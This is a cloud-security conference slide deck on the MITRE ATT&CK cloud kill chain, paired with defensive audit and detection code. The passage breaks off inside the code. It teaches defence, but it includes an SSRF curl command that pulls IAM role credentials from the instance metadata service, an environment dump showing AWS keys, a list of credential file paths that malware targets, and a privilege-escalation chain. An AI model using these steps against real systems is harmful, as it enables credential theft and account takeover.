Breaking The Cloud Kill Chain
Eric Johnson
• Principal Security Engineer, Puma Security
→ Coder: cloud infrastructure automation, CI / CD orchestration, static analysis engine, security tools
→ Security assessments: Cloud, DevOps, source code, web apps, mobile apps
• Senior Instructor, SANS Institute
→ Contributing author of SEC540, SEC510, SEC549
• Education & Training
→ Iowa State M.S. Information Assurance, B.S. Computer Engineering
→ AWS Certified Developer, CISSP, GPCS, GSSP, GWAPT
• Contact information
→ Email: ejohnson@pumasecurity.io
→ LinkedIn: https://www.linkedin.com/in/eric-m-johnson/
→ Twitter: @emjohn20
$ aws sts get-caller-identity
Agenda
1. Cloud MITRE ATT&CK Framework
2. Cloud Infrastructure Discovery
3. Unsecured Credentials
4. Network Service Discovery
5. Transfer Data to Cloud Account
Understanding the Cloud Kill Chain
MITRE ATT&CK tactics covering cloud-based attack techniques.
MITRE ATT&CK Cloud Services
The MITRE ATT&CK Cloud Matrix guides our attack methodology for the key cloud services.
T1580: Cloud Infrastructure Discovery
Cloud Infrastructure Discovery
MITRE ATT&CK T1580: Discovering infrastructure and resources misconfigured for public cloud access:
• Storage buckets
• Big data sets / databases
• Container image repositories
• Secrets and cryptographic keys
• Virtual machine image or database snapshots
AWS Publicly Exposable Resources
AWS Exposable Resources, by Scott Piper, contains a list of non-VPC bound AWS resources that can also be exposed publicly:
• S3 bucket ACLs and public bucket policies
• EBS volume snapshots shared publicly
• EC2 Amazon Machine Images (AMIs) shared publicly
• ECR public container image repositories
• RDS database and cluster snapshots shared publicly
• SQS queue public policies
• SNS topic public policies
• Lambda function URLs providing a dedicated HTTPS endpoint (public when the URL's auth type is NONE)
• More at https://github.com/SummitRoute/aws_exposable_resources
BigQuery Public Datasets
BigQuery datasets support sharing with allUsers (any unauthenticated caller on the Internet) and with identities from external Cloud Identity accounts.
Azure Virtual Machine Disk Snapshots
• Sharable with other users in the Azure AD tenant
• Supports direct downloads using SAS tokens
• Provides a non-VNet bound way to exfiltrate snapshots
Breaking The Kill Chain: MITRE ATT&CK T1580
Defending against resource misconfiguration starts with applying detective and preventative policies in the resource hierarchy:
• AWS: Service Control Policy (SCP)
• Azure: Azure Policy
• GCP: Organization Policy
Breaking The Kill Chain: Cloud Resource Hierarchy
Service Control Policy (SCP) documents can attach to the root, OU, and account level nodes in the AWS organization.
Breaking The Kill Chain: Service Control Policies
Example SCPs blocking API calls to modify public S3 and Lambda function URL configurations:

{
    "Statement": [
        {
            "Action": [
                "s3:PutAccountPublicAccessBlock"
            ],
            "Resource": "*",
            "Effect": "Deny"
        }
    ]
}

{
    "Statement": [ {
        "Action": [
            "lambda:CreateFunctionUrlConfig",
            "lambda:UpdateFunctionUrlConfig"
        ],
        "Resource": "arn:aws:lambda:*:*:function/*",
        "Effect": "Deny",
        "Condition": {
            "StringNotEquals": {
                "lambda:FunctionUrlAuthType": "AWS_IAM"
                …
}

The first SCP only freezes the account-level S3 Block Public Access setting, so that setting must already be turned on in every member account for the guardrail to mean anything. The second denies creating or updating a function URL whenever its auth type is not AWS_IAM, which closes the AuthType NONE path. Both examples omit the required "Version": "2012-10-17" element for brevity, and, like any SCP, they cap what principals in member accounts can do without granting anything and without applying to the organization's management account.
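The SCPs above are the preventive side; the detective side is finding the resource policies that already make one of the exposable resources public. The following is an added example, not code from the deck or from the AWS Exposable Resources project: it walks resource policies (S3 bucket policies, SQS and SNS policies, and the policy AWS attaches to a Lambda function URL) and reports any statement that lets an anonymous principal in. The sample policies, account IDs, and resource names are constructed for the example, and the set of "caller-restricting" condition keys is a heuristic chosen here, not an IAM evaluator.

```python
"""Detect resource policies that grant access to everyone.

Added example, not code from the slides. It is the detective counterpart of
the SCPs above: given resource policies pulled from an account (S3 bucket
policies, SQS/SNS policies, the policy AWS attaches to a Lambda function
URL, ...), report every statement that lets an anonymous principal in.
All sample policies below are constructed for the example; nothing here
calls AWS.
"""
import json

# Condition keys that narrow WHO may call. A Condition built only from other
# keys (lambda:FunctionUrlAuthType, aws:SecureTransport, s3:x-amz-acl, ...)
# does not make a "*" principal any less public. Heuristic, not an evaluator.
CALLER_RESTRICTING_KEYS = {
    "aws:principalorgid", "aws:principalorgpaths", "aws:principalaccount",
    "aws:principalarn", "aws:sourceaccount", "aws:sourcearn", "aws:sourceowner",
    "aws:sourcevpc", "aws:sourcevpce", "aws:sourceip", "aws:userid",
}


def _as_list(value):
    """Policy elements may be a string or a list of strings."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_anonymous(principal):
    """True for "*" and for {"AWS": "*"} / {"AWS": ["*", ...]}."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))


def _condition_restricts_caller(condition):
    """True if any operator block names a caller-restricting key."""
    for keys in (condition or {}).values():      # {"StringEquals": {key: value}}
        if any(k.lower() in CALLER_RESTRICTING_KEYS for k in keys):
            return True
    return False


def public_statements(policy):
    """Statements that allow an anonymous principal without restricting it."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_anonymous(stmt.get("Principal")):
            continue
        if _condition_restricts_caller(stmt.get("Condition")):
            continue
        findings.append({
            "sid": stmt.get("Sid", "<no sid>"),
            "actions": _as_list(stmt.get("Action")),
            "resources": _as_list(stmt.get("Resource")),
        })
    return findings


def audit(policies):
    """resource name -> public statements, for every resource that has any."""
    report = {}
    for name, doc in policies.items():
        found = public_statements(doc)
        if found:
            report[name] = found
    return report


# Constructed sample policies, one per exposable resource type from the list.
SAMPLE_POLICIES = {
    # Public bucket policy: anonymous read of every object.
    "s3://example-reports": {"Version": "2012-10-17", "Statement": [{
        "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
        "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-reports/*"}]},
    # "*" pinned to the organization: anyone in the org, but not public.
    "sqs:orders-queue": {"Version": "2012-10-17", "Statement": [{
        "Sid": "OrgOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
        "Action": "sqs:SendMessage",
        "Resource": "arn:aws:sqs:us-east-1:123456789012:orders-queue",
        "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-exampleorgid"}}}]},
    # Anyone on the Internet may subscribe to the topic.
    "sns:alerts-topic": {"Version": "2012-10-17", "Statement": [{
        "Sid": "AnyoneSubscribe", "Effect": "Allow", "Principal": {"AWS": ["*"]},
        "Action": ["sns:Subscribe", "sns:Receive"],
        "Resource": "arn:aws:sns:us-east-1:123456789012:alerts-topic"}]},
    # Shape of the policy a function URL with AuthType NONE carries: the only
    # Condition is on the auth type, so the statement is still public.
    "lambda:report-generator": {"Version": "2012-10-17", "Statement": [{
        "Sid": "FunctionURLAllowPublicAccess", "Effect": "Allow", "Principal": "*",
        "Action": "lambda:InvokeFunctionUrl",
        "Resource": "arn:aws:lambda:us-east-1:123456789012:function:report-generator",
        "Condition": {"StringEquals": {"lambda:FunctionUrlAuthType": "NONE"}}}]},
}
```

Running audit(SAMPLE_POLICIES) reports the bucket, the topic, and the function URL but not the queue: the queue's "*" is narrowed by aws:PrincipalOrgID, while the function URL's only condition says nothing about who the caller is. Feed it the documents returned by get-bucket-policy, get-queue-attributes, get-topic-attributes, and get-policy (Lambda) to use it against a real account; IAM Access Analyzer performs the same reasoning with a full evaluator.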
T1552: Unsecured Credentials
Unsecured Credentials
MITRE ATT&CK T1552: Discovering insecurely stored IAM and service account credentials.
Unsecured credential locations:
• Bash history
• Configuration files
• Source code
• Version control
• Instance metadata service
• Environment variables
Cloud Credential Types
Attackers target credentials that map to many different principal types across the cloud providers:
• AWS IAM: IAM users & roles
• Azure AD: service principals & managed identities
• Cloud Identity (GCP): service accounts
Configuration File Credentials
Cloud-focused malware (e.g., TeamTNT) will focus on common locations with cleartext credentials:
• ~/.aws/credentials
• ~/.azure/accessTokens.json
• ~/.config/gcloud/*credential*
• ~/.ssh/*
Version Control and Package Managers
• Node Package Manager (npm)
→ Scanned by Aidan Steele in October 2021
→ Identified 117 valid API keys, including 30 AWS root access keys
→ https://sec549.com/id259
• Python Package Index (PyPI)
→ Scanned by Tom Forbes in January 2023
→ Identified 57 valid AWS API keys, including 11 AWS root access keys
→ https://sec549.com/id260
Environment Variable Credentials

env | grep 'AWS'
AWS_LAMBDA_FUNCTION_VERSION=$LATEST
AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q...4pg9g==
AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/serverlessprey-panther
AWS_LAMBDA_LOG_STREAM_NAME=2020/01/05/[$LATEST]786a6193a27eb390c0a
AWS_DEFAULT_REGION=us-east-1
AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG
AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A

• Continuous Integration pipelines, containers, and functions often have secrets stored in environment variables
• Local File Inclusion (LFI) and Command Injection vulnerabilities can allow attackers to exfiltrate environment variables
• The ASIA prefix and the AWS_SESSION_TOKEN show these are temporary credentials for the function's execution role: they cannot be deleted like an IAM user access key, so cutting off an attacker means revoking the role's active sessions (a deny on aws:TokenIssueTime) or waiting for the session to expire
Server-Side Request Forgery Credential Extraction
Server-side Request Forgery (SSRF) vulnerabilities can allow attackers to communicate directly with virtual machine instance metadata services:

curl -s "https://nimbus.labs/api/emrs?resource=http://169.254.169.254/latest/meta-data/iam/security-credentials/nimbus-iam-role"
{
  "Code" : "Success",
  "LastUpdated" : "2020-04-16T18:36:31Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA54BL6PJR3MV6PUNZ",
  "SecretAccessKey" : "S0M6vF4UmMlfmV5B/bM2lalWpdTzocbUsSWMMHRI",
  "Token" : "IQoJb3JpZ2luX2VjEJP...3QtMSJGMEQCIGlgtwykQYitLv8Vg==",
  "Expiration" : "2020-04-17T00:52:19Z"
}

This request only succeeds against IMDSv1. With IMDSv2 enforced (HttpTokens set to required), every metadata read must first obtain a session token with a PUT request carrying the X-aws-ec2-metadata-token-ttl-seconds header, and the token response has a default hop limit of 1, so a GET-only SSRF or a request relayed through a proxy cannot retrieve the role credentials.
Breaking The Kill Chain: MITRE ATT&CK T1552
Defending against unsecured credentials requires defense in depth controls:
• Secrets scanning: version control repositories
• Compromised credential detection: cloud threat detection
• Workload identity federation: OpenID Connect identity provider
Breaking The Kill Chain: Version Control Secrets Scanning
Perform incremental and continuous secrets scanning.
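What "incremental" means in practice is scanning the lines a change adds rather than the whole tree on every commit. The following is an added example, not the deck's code and not any of the scanners it names: a small scanner for the credential shapes covered in this section (AWS access key IDs and secrets, GCP service account key files, private key blocks) that runs over the diff between two versions of a file and classifies AWS keys by prefix. The patterns are this example's own (tune them for your repositories), and the before/after file contents are constructed; the key material in them is AWS's documented example key pair.

```python
"""Incremental secrets scanning for cloud credentials.

Added example, not part of the slides or of any scanner the deck names.
It scans only the lines a change adds (the "incremental" part), looks for
the credential shapes discussed in this section, and classifies AWS keys
by prefix: AKIA = long-lived IAM user key, ASIA = temporary STS key.
The before/after file contents are constructed for the example.
"""
import difflib
import re

# Patterns for the credential types in this section. Written for this
# example from the documented key formats; tune them for your repositories.
PATTERNS = {
    # 20-char AWS access key ID; the prefix tells long-lived from temporary.
    "aws_access_key_id": re.compile(r"\b((?:AKIA|ASIA)[A-Z0-9]{16})\b"),
    # 40-char secret following a key-style assignment.
    "aws_secret_access_key": re.compile(
        r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+]{40})\b"),
    # GCP service account key files carry this literal type marker.
    "gcp_service_account_key": re.compile(r'"type"\s*:\s*"service_account"'),
    # Private key blocks (SSH, TLS and GCP SA keys all use one of these).
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |)PRIVATE KEY-----"),
}


def classify_aws_key(key_id):
    """AKIA keys never expire on their own; ASIA keys are STS session keys."""
    return "long-lived" if key_id.startswith("AKIA") else "temporary"


def scan_text(text, path="<text>"):
    """Full scan: one finding per (line, pattern) match."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                finding = {"path": path, "line": lineno, "type": name}
                if name == "aws_access_key_id":
                    finding["key_id"] = match.group(1)
                    finding["lifetime"] = classify_aws_key(match.group(1))
                findings.append(finding)
    return findings


def added_lines(old_text, new_text):
    """Lines present in new_text but not in old_text, as (new_lineno, line)."""
    old, new = old_text.splitlines(), new_text.splitlines()
    matcher = difflib.SequenceMatcher(None, old, new)
    out = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            out.extend((j + 1, new[j]) for j in range(j1, j2))
    return out


def scan_change(old_text, new_text, path):
    """Incremental scan: only the lines this change introduces are examined,
    so a secret that was already triaged is not re-reported on every commit
    and a pipeline can fail fast on the diff alone."""
    findings = []
    for lineno, line in added_lines(old_text, new_text):
        for finding in scan_text(line, path):
            finding["line"] = lineno
            findings.append(finding)
    return findings


# Constructed sample: a credentials file before and after a bad commit.
# The AKIA/secret pair is the example key pair from the AWS documentation.
OLD_SETTINGS = """[default]
region = us-east-1
output = json
"""

NEW_SETTINGS = """[default]
region = us-east-1
output = json
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
[lambda-debug]
aws_access_key_id = ASIAIOSFODNN7EXAMPLE
"""
```

scan_change(OLD_SETTINGS, NEW_SETTINGS, "credentials") reports three findings on lines 4, 5 and 7 and nothing from the unchanged header. Whether a hit is live, and whose it is, is checked out of band with the key itself: aws sts get-caller-identity returns the owning account and principal, and an ARN ending in :root is the case the npm and PyPI scans counted separately.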
Breaking The Kill Chain: Cloud Threat Detection
Cloud-native threat detection services have limited coverage for catching the use of stolen credentials:
• AWS GuardDuty
→ *:IAMUser/AnomalousBehavior
→ UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS
→ UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS
The exfiltration findings fire when role credentials issued to an instance are used from somewhere else; a long-lived access key leaked from a repository is only caught if its use looks anomalous.
Breaking The Kill Chain: Cloud Threat Hunting
Threat hunting will have to fill the gaps. Google Cloud Logging entry:

protoPayload: {
  @type: "type.googleapis.com/google.cloud.audit.AuditLog"
  authenticationInfo: {
    principalEmail: "cheetah-354157@appspot.gserviceaccount.com"
    principalSubject: "user:sec510-354157@appspot.gserviceaccount.com"
  }
  …
  methodName: "google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion"
  resourceName: "projects/123456789012/secrets/cheetah-database-pass/versions/latest"
  serviceName: "secretmanager.googleapis.com"
  requestMetadata: {
    callerIp: "95.025.143.109"
    callerSuppliedUserAgent: "curl/7.64.1,gzip(gfe),gzip(gfe)"
    …
  }
}
…
timestamp: "2023-01-10T20:30:00.192825193Z"

Why is a Cloud Function service account accessing secrets from an external IP address? The curl user agent is a second indicator: the function's own code would go through a Google client library.
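The question on the slide can be turned into a standing hunt over exported audit log entries. The following is an added example, not the deck's code: it keeps Secret Manager AccessSecretVersion calls where the principal is a service account and the callerIp is a public address. Google's RequestMetadata documentation defines callerIp as the public address for Internet callers, the VM's address for Compute Engine callers, and the sentinel "private" (or "gce-internal-ip") for calls that stayed inside Google's network, so anything that is not a public IP is treated as internal here. The log lines are constructed for the example (the public address is the slide's callerIp with its malformed leading zero removed so it parses), and the internal user-agent string is an assumption.

```python
"""Hunt for service-account secret reads from outside Google Cloud.

Added example, not from the slides: the question on the slide turned into a
filter over Cloud Audit Log entries exported as JSON lines. Per Google's
RequestMetadata docs, callerIp is a public address for Internet callers,
the VM address for Compute Engine callers, and "private" / "gce-internal-ip"
for service-to-service calls inside Google's network; the filter treats
anything that is not a public IP as internal. The log lines below are
constructed for the example.
"""
import ipaddress
import json

SECRET_READ_METHODS = {
    "google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion",
    "google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion",
}


def caller_is_external(caller_ip):
    """True only for a routable public address; sentinels and RFC 1918 are not."""
    try:
        return ipaddress.ip_address(caller_ip).is_global
    except ValueError:                     # "private", "gce-internal-ip", ""
        return False


def is_service_account(principal):
    return principal.endswith(".gserviceaccount.com")


def suspicious_secret_reads(entries):
    """Entries worth a hunter's time: a service account reading a secret from
    a public IP. The user agent is carried along because a function's own
    code talks through a Google client library, not curl."""
    hits = []
    for entry in entries:
        payload = entry.get("protoPayload", {})
        if payload.get("methodName") not in SECRET_READ_METHODS:
            continue
        principal = payload.get("authenticationInfo", {}).get("principalEmail", "")
        meta = payload.get("requestMetadata", {})
        ip = meta.get("callerIp", "")
        if is_service_account(principal) and caller_is_external(ip):
            hits.append({
                "timestamp": entry.get("timestamp"),
                "principal": principal,
                "secret": payload.get("resourceName"),
                "caller_ip": ip,
                "user_agent": meta.get("callerSuppliedUserAgent", ""),
            })
    return hits


def load_entries(json_lines):
    """Parse one exported log entry per line (blank lines ignored)."""
    return [json.loads(line) for line in json_lines.splitlines() if line.strip()]


def _entry(principal, caller_ip, user_agent, timestamp,
           method="google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion"):
    """Build a constructed audit entry carrying the fields the hunt uses."""
    return json.dumps({
        "protoPayload": {
            "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
            "authenticationInfo": {"principalEmail": principal},
            "methodName": method,
            "resourceName": "projects/123456789012/secrets/cheetah-database-pass/versions/latest",
            "serviceName": "secretmanager.googleapis.com",
            "requestMetadata": {"callerIp": caller_ip, "callerSuppliedUserAgent": user_agent},
        },
        "timestamp": timestamp,
    })


FUNCTION_SA = "cheetah-354157@appspot.gserviceaccount.com"
COMPUTE_SA = "123456789012-compute@developer.gserviceaccount.com"
LIBRARY_UA = "google-cloud-sdk gl-python/3.9"   # assumed library user agent

# Constructed sample export: the function's normal read, a VM's read from
# its internal address, a human's read from a laptop, and the slide's curl
# read from the Internet.
SAMPLE_LOG = "\n".join([
    _entry(FUNCTION_SA, "private", LIBRARY_UA, "2023-01-10T20:01:00Z"),
    _entry(COMPUTE_SA, "10.128.0.7", LIBRARY_UA, "2023-01-10T20:05:00Z"),
    _entry("alice@example.com", "95.25.143.109", "Mozilla/5.0", "2023-01-10T20:10:00Z"),
    _entry(FUNCTION_SA, "95.25.143.109", "curl/7.64.1,gzip(gfe),gzip(gfe)", "2023-01-10T20:30:00Z"),
])
```

Only the last entry survives the filter. The same shape works as a Cloud Logging query (protoPayload.methodName, principalEmail ending in gserviceaccount.com, and callerIp not "private"); the Python version is useful when the export is being replayed in a SIEM or a notebook.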
Breaking The Kill Chain: Workload Identity Federation
With workload identity federation the workload (a CI job, a pod, a function in another cloud) presents its OpenID Connect token to the cloud provider's token service and receives short-lived credentials, so there is no long-lived key to leak into a repository, a package, or an environment variable.
Protip: Long-lived credentials must die!
T1046: Network Service Discovery
Network Service Discovery
MITRE ATT&CK T1046: Enumerating resources with public IP addresses in the victim's cloud account:
• VPC-bound resource types include virtual machines, load balancers, containers, datastores, Redis clusters, and data lakes
• Public cloud IP address blocks are well known (each provider publishes its address ranges)
• Large scale cloud network service discovery (e.g., Shodan, Nmap)
→ Cloud Scanning For Vulnerability Discovery by @joswr1ght: https://sec510.com/1042
• Identify remotely exploitable hosts and software
AWS Default Virtual Machine Security Group
EC2 instances created in the AWS Web Console auto-generate a new security group with default open admin access:
• Linux VMs auto-populate open SSH access (22/tcp from 0.0.0.0/0)
• Windows VMs auto-populate open RDP access (3389/tcp from 0.0.0.0/0)
Azure Default Virtual Machine Network Access
Azure Virtual Machines created in the portal default to open admin access:
• Linux VMs auto-populate open SSH access
• Windows VMs auto-populate open RDP access
GCP Default Network Firewall Rules
The default VPC network contains pre-populated firewall rules allowing wide open administrative access (default-allow-ssh and default-allow-rdp from 0.0.0.0/0).
Misconfigured GCP Firewall Rules
Shodan searching for virtual machines on Google Compute Engine exposing SSH and RDP ports.
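Shodan finds these rules from the outside; the defender's check is to find them from the inside before an attacker does. The following is an added example, not the deck's code: one audit over the two rule shapes the slides above describe, EC2 security groups as returned by describe-security-groups and GCE firewall rules as returned by compute firewalls list, reporting any rule that opens SSH or RDP to the whole Internet. The group IDs, rule names, and CIDRs are constructed for the example and no cloud API is called.

```python
"""Find the default "open admin" network rules from the slides above.

Added example, not from the slides. One check run over two rule shapes:
EC2 security groups as returned by describe-security-groups (IpPermissions
with FromPort/ToPort/IpRanges) and GCE firewall rules as returned by
compute firewalls list (sourceRanges plus allowed[{IPProtocol, ports}]).
Sample rules below are constructed for the example; nothing here calls a
cloud API.
"""
import ipaddress

ADMIN_PORTS = {22: "ssh", 3389: "rdp"}


def _cidr_is_anywhere(cidr):
    """True for 0.0.0.0/0 or ::/0, however the prefix is spelled."""
    try:
        return ipaddress.ip_network(cidr, strict=False).prefixlen == 0
    except ValueError:
        return False


def _port_range_hits(lo, hi):
    """Admin ports that fall inside [lo, hi]."""
    return sorted(p for p in ADMIN_PORTS if lo <= p <= hi)


def _parse_gce_port(spec):
    """GCE port specs are "22" or "1000-2000"; return (lo, hi)."""
    lo, _, hi = spec.partition("-")
    return int(lo), int(hi or lo)


def ec2_open_admin_rules(security_group):
    """Findings for one describe-security-groups entry (ingress rules)."""
    findings = []
    for perm in security_group.get("IpPermissions", []):
        proto = perm.get("IpProtocol")
        if proto == "-1":                               # all traffic
            lo, hi = 0, 65535
        elif proto in ("tcp", "6"):
            lo, hi = perm.get("FromPort", 0), perm.get("ToPort", 65535)
        else:
            continue
        ranges = [r["CidrIp"] for r in perm.get("IpRanges", [])]
        ranges += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
        open_ranges = [r for r in ranges if _cidr_is_anywhere(r)]
        if not open_ranges:
            continue
        for port in _port_range_hits(lo, hi):
            findings.append({"group": security_group.get("GroupId"), "port": port,
                             "service": ADMIN_PORTS[port], "source": open_ranges})
    return findings


def gce_open_admin_rules(firewall):
    """Findings for one compute firewall rule (enabled ingress allow rules)."""
    if firewall.get("direction", "INGRESS") != "INGRESS" or firewall.get("disabled"):
        return []
    open_ranges = [r for r in firewall.get("sourceRanges", []) if _cidr_is_anywhere(r)]
    if not open_ranges:
        return []
    findings = []
    for allowed in firewall.get("allowed", []):
        if allowed.get("IPProtocol") not in ("tcp", "all"):
            continue
        for spec in allowed.get("ports") or ["0-65535"]:
            for port in _port_range_hits(*_parse_gce_port(spec)):
                findings.append({"rule": firewall.get("name"), "port": port,
                                 "service": ADMIN_PORTS[port], "source": open_ranges})
    return findings


def audit_all(ec2_groups, gce_firewalls):
    findings = []
    for sg in ec2_groups:
        findings.extend(ec2_open_admin_rules(sg))
    for fw in gce_firewalls:
        findings.extend(gce_open_admin_rules(fw))
    return findings


# Constructed samples: a console-generated launch-wizard group, a group
# restricted to a corporate range, and the GCP default network rules.
SAMPLE_EC2_GROUPS = [
    {"GroupId": "sg-0123456789abcdef0", "GroupName": "launch-wizard-1",
     "IpPermissions": [{"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
                        "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}]},
    {"GroupId": "sg-0fedcba9876543210", "GroupName": "bastion-corp-only",
     "IpPermissions": [{"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
                        "IpRanges": [{"CidrIp": "198.51.100.0/24"}], "Ipv6Ranges": []}]},
]
SAMPLE_GCE_FIREWALLS = [
    {"name": "default-allow-ssh", "direction": "INGRESS",
     "sourceRanges": ["0.0.0.0/0"], "allowed": [{"IPProtocol": "tcp", "ports": ["22"]}]},
    {"name": "default-allow-rdp", "direction": "INGRESS",
     "sourceRanges": ["0.0.0.0/0"], "allowed": [{"IPProtocol": "tcp", "ports": ["3389"]}]},
    {"name": "default-allow-internal", "direction": "INGRESS",
     "sourceRanges": ["10.128.0.0/9"], "allowed": [{"IPProtocol": "tcp", "ports": ["0-65535"]}]},
]
```

audit_all(SAMPLE_EC2_GROUPS, SAMPLE_GCE_FIREWALLS) returns the launch-wizard group and the two GCP default rules; the corporate-only group and default-allow-internal pass. A rule that allows all protocols ("-1" on EC2, "all" on GCE) to 0.0.0.0/0 is reported for both ports, which is the case the console wizards never produce but hand-written rules often do.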
Breaking The Kill Chain: MITRE ATT&CK T1046
Defending against network service discovery requires organizations to build more advanced network architectures:
• AWS: Shared VPC & Transit Gateway
• Azure: Azure Virtual WAN
• Google Cloud: Shared VPC, Cloud Routing, Peering, VPN
Breaking The Kill Chain: VPC Sharing
Centralize VPC resources into a single network host account (or project) in the resource hierarchy:
• VPC networks & subnets
• Internet & NAT gateways
• Public IP addresses
• Route tables
• Firewall rules
→ NACLs
→ Security groups
• VPC endpoints
Breaking The Kill Chain: Restricting Public Network Connectivity
Preventing unauthorized public network access: actions creating public connectivity are denied, except for the network host account.

{
    "Sid": "RestrictPublicConnectivityToInfrastructureAccounts",
    "Effect": "Deny",
    "Action": [
        "ec2:AllocateAddress",
        "ec2:AttachInternetGateway",
        "ec2:CreateInternetGateway",
        "ec2:CreateEgressOnlyInternetGateway",
        "ec2:CreateVpcPeeringConnection",
        "ec2:AcceptVpcPeeringConnection",
        "globalaccelerator:Create*",
        "globalaccelerator:Update*"
    ],
    "Resource": "*",
    "Condition": {
        "StringNotEquals": {
            "aws:PrincipalAccount": [
                "123456789012" ]
        … }
Breaking The Kill Chain: Centralized Resource Configurations
Centralizing network resources into the network host account provides a single pane of glass for public connectivity: a public inventory.
Breaking The Kill Chain: Centralized Inbound, Outbound, Traffic Inspection
T1537: Transfer Data to Cloud Account
Transfer Data to the Attacker's Cloud Account
MITRE ATT&CK T1537: Exfiltrating data from the victim's cloud account by escalating privileges and transferring data on the cloud provider's backbone network to avoid network-based detection:
• Compromising over-permissioned service accounts
• Impersonating a target service account
• Transferring data across the cloud provider's backbone network
• Pivoting with stolen credentials
Privilege Escalation: Azure Overly Scoped Role Definition
Example role definition allowing excessive permissions and overly scoped access to resources (subscription-wide scope to all storage accounts):

{
    "assignableScopes": [ "/subscriptions/${var.subscription_id}" ],
    "permissions": [
        {
            "actions": [
                "Microsoft.Storage/storageAccounts/listKeys/action",
                "Microsoft.Storage/storageAccounts/ListAccountSas/action",
                "Microsoft.Storage/storageAccounts/read"
            ]
        }
    ],
    "roleName": "Storage Access"
}

listKeys returns the storage account keys, which are full data-plane credentials for every container, queue, and table in that account, so an assignment of this role at the subscription scope hands over the data in every storage account in the subscription.
Privilege Escalation: Google Cloud's Primitive Editor Role
Google Cloud's primitive (now "basic") Editor role has permission to view, modify, and delete existing project resources (with a few exceptions):
• Default role granted to the default service accounts used by Compute instances, App Engine services, and Cloud Functions
• Too permissive for what your workload needs in production
• Has over 4,000 assigned permissions on the project
• Attackers compromising workloads with Editor permissions can access data across the project
Privilege Escalation: Transitive Permission Assignment
Transitive privilege escalation occurs by creating a resource that inherits permissions from a supplied service account:
• AWS: iam:PassRole permission
• GCP: iam.serviceAccounts.actAs permission
Escalation chain: create a Compute instance → configure Compute to run as the target service account → obtain a token through the Instance Metadata Server (IMDS) → impersonate the privileged service account in the project.
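The three escalation paths on the slides above (an over-scoped Azure role, Editor on a workload's service account, and the PassRole/actAs chain) all leave a trace in IAM configuration before anyone abuses them. The following is an added example, not the deck's code: one audit with a check for each path, run over configuration in the shape the providers' APIs return it. The Azure role is the one from the slide; the other samples, account IDs, and principal names are constructed for the example, and the Azure check treats a scope as "broad" when it is the tenant root, a management group, or a subscription root.

```python
"""Audit IAM configuration for the escalation paths in this section.

Added example, not from the slides. Three checks over configuration as it
comes back from the providers' APIs (samples constructed for the example):
  azure_role_findings   - custom role definitions whose assignableScopes
                          reach a whole subscription or management group AND
                          whose actions include storage key/SAS listing;
  gcp_editor_findings   - project IAM bindings giving roles/editor or
                          roles/owner to a service account (a workload);
  aws_passrole_findings - identity policies allowing iam:PassRole on every
                          role, the AWS side of the transitive escalation
                          (GCP's equivalent is iam.serviceAccounts.actAs).
"""
import fnmatch

KEY_LISTING_ACTIONS = (
    "microsoft.storage/storageaccounts/listkeys/action",
    "microsoft.storage/storageaccounts/listaccountsas/action",
)
BROAD_GCP_ROLES = {"roles/editor", "roles/owner"}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, target):
    """Case-insensitive wildcard match, as IAM actions use ("*", "iam:*")."""
    return fnmatch.fnmatchcase(target.lower(), pattern.lower())


def scope_is_broad(scope):
    """Tenant root, a management group, or a subscription root."""
    parts = [p for p in scope.split("/") if p]
    if not parts:
        return True
    if parts[0].lower() == "subscriptions" and len(parts) == 2:
        return True
    return any(p.lower() == "managementgroups" for p in parts)


def azure_role_findings(role):
    broad = [s for s in role.get("assignableScopes", []) if scope_is_broad(s)]
    actions = [a for perm in role.get("permissions", []) for a in perm.get("actions", [])]
    key_actions = sorted({t for a in actions for t in KEY_LISTING_ACTIONS if _matches(a, t)})
    if broad and key_actions:
        return [{"role": role.get("roleName"), "scopes": broad, "actions": key_actions}]
    return []


def gcp_editor_findings(policy):
    return [{"role": b["role"], "member": m}
            for b in policy.get("bindings", []) if b.get("role") in BROAD_GCP_ROLES
            for m in b.get("members", []) if m.startswith("serviceAccount:")]


def aws_passrole_findings(policy):
    """Allow statements granting iam:PassRole on "*" with no Condition; a
    principal holding this plus ec2:RunInstances can launch an instance
    that runs as any role in the account."""
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        if not any(_matches(a, "iam:PassRole") for a in _as_list(stmt.get("Action"))):
            continue
        if "*" in _as_list(stmt.get("Resource")):
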